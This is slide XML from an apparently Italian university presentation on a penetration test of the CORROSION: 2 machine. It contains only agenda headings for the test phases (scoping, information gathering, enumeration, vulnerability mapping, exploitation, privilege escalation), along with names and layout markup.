              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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318527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1ACE35-D3F9-5B55-578E-DAAA610EE0D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4077687"/>
            <a:ext cx="12188952" cy="1109031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Penetration Testing &amp; Ethical hacking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3CCFC07-B111-42A4-897F-D953BA1183B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007225" y="5085322"/>
            <a:ext cx="10191405" cy="54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400" kern="1200" cap="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Analisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="12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2400" kern="1200" cap="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della</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="12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2400" kern="1200" cap="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macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="12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CORROSION: 2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787B496-574E-A30D-1B90-28695E6F5F55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978034" y="6109295"/>
            <a:ext cx="306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Studente: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-I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Federico De Mattia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D2E00A6-8E35-EFB0-ED93-727E25B6D0F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7153100" y="6109295"/>
            <a:ext cx="351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Docente: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-I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Arcangelo Castiglione</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene spazio, stella, web">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F508AF4-1326-F7A9-AAF3-7BEB4D9EBA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9" b="19161"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252564" y="653906"/>
            <a:ext cx="9683821" cy="3626138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:solidFill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6FCB41-3BDB-46DC-6743-325ED69CF38D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="1915365"/>
            <a:ext cx="12188952" cy="1109031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cap="all" spc="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Grazie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" kern="12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per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" kern="1200" cap="all" spc="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l’attenzione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" kern="1200" cap="all" spc="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4985858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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="1348172"/>
            <a:ext cx="2611973" cy="236512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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
